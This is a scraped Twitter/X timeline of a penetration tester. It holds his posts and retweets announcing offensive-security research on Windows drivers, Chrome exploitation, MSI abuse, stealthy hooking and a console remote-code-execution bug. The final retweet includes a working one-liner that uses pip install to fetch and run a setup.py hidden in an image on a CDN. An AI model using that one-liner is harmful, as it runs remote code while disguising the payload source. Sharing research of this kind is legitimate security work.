V3ded
1.2K posts

V3ded
@V3ded

Penetration Tester, Researcher | Opinions are my own and not the views of my employer | Yes I’m still alive, just taking a break

jackram
Joined August 2014
120 Following 1.1K Followers

Pinned Tweet
V3ded@V3ded·
I’m releasing the second part of my driver development series. Throughout the post I will explore the Windows Filtering Platform (WFP) and its use in handling specifically crafted ICMP network packets. Let me know what you think! v3ded.github.io/redteam/red-te… #redteam #infosec
V3ded retweeted
Jack Halon@jack_halon·
Back in 2018, I released a post on how to break into pentesting, and it's been shared widely in the security community ever since. With so many changes in the field, I've reworked the post to reflect current standards and answer more questions. Enjoy! jhalon.github.io/breaking-into-…
V3ded@V3ded·
New blog post, perhaps 👀?
V3ded@V3ded·
Dang
V3ded@V3ded·
Oh maaan. Process creation from kernel mode is such a pain.
Jack Halon@jack_halon·
In 2023, I wish for all Red Teams to finally understand that "unhooking APIs" or using "system calls" doesn't equate to an "edr bypass". Kernel Callbacks/Telemetry is a thing, so even if you get around a prevention policy, that doesn't mean you've "blinded the edr".
V3ded retweeted
Jack Halon@jack_halon·
To wrap up 2022, I'm releasing the final part of my 3-part browser exploitation series on Chrome! In this post, we demonstrate the practical use of the concepts we've learned throughout the series by analyzing and exploiting CVE-2018-17463. Enjoy! jhalon.github.io/chrome-browser…
V3ded@V3ded·
New blog coming sometime tomorrow 👀!
V3ded retweeted
PabloMK7@Pablomf6·
Here is ENLBufferPwn (CVE ID pending), a severe vulnerability in many first party 3DS, Wii U and Switch games. It allows remote code execution in a victim console by just having an online game session with an attacker. Vulnerability report: github.com/PabloMK7/ENLBu… 🧵(1/7)
V3ded retweeted
mgeeky | Mariusz Banach@mariuszbit·
☢️ Recently we started seeing Threat Actors abusing MSI Windows Installation files for Initial Access & code execution 🔥 I now release Part 1 insights into how MSIs can be abused, PoCs for 🔴 & dissection utility for 🔵 🦠 Let me know what you think! bit.ly/3jc6myt
V3ded retweeted
x86matthew@x86matthew·
StealthHook - A method for hooking functions without modifying memory protection. This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception. x86matthew.com/view_post?id=s…
V3ded retweeted
Kiwids@mhskai2017·
I wrote a blog post that talks about how we can abuse yet another Chrome Remote Debugging feature to "stalk" end users. posts.specterops.io/stalking-insid…
V3ded retweeted
vx-underground@vxunderground·
We've updated our paper collection. The new papers demonstrate the following:
- Resolving syscalls in C#
- HeavensGate in C#
- Thread Stack Spoofing
- Inline syscalls in C++
- Inline function calls in C++
- x64 return address spoofing
vx-underground.org/windows.html
V3ded retweeted
CCob🏴󠁧󠁢󠁷󠁬󠁳󠁿@_EthicalChaos_·
Here you go folks, initial release of Volumiser. Dealing with those 100G virtual disc images during red team ops just got easier. Limited testing so far so would love to hear about any problems that pop up. github.com/CCob/Volumiser
V3ded retweeted
Kuba Gretzky@mrgretzky·
Microsoft has just released a patch for ZIP MOTW vulnerability assigned as CVE-2022-41091. I am happy to be able to finally drop my bug analysis write-up! 🔥🪲 Enjoy and happy patching! breakdev.org/zip-motw-bug-a…
V3ded retweeted
Yun@YunZhengHu·
I just published dissect.cobaltstrike v1.0.0. It now supports parsing and decrypting C2 traffic from PCAP files and also adds Beacon Client support which allows you to connect to a Team Server and receive tasks and send back data like a real Beacon. github.com/fox-it/dissect…
V3ded retweeted
David Buchanan does not tweet anymore
TIL python's pip will execute a setup.py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"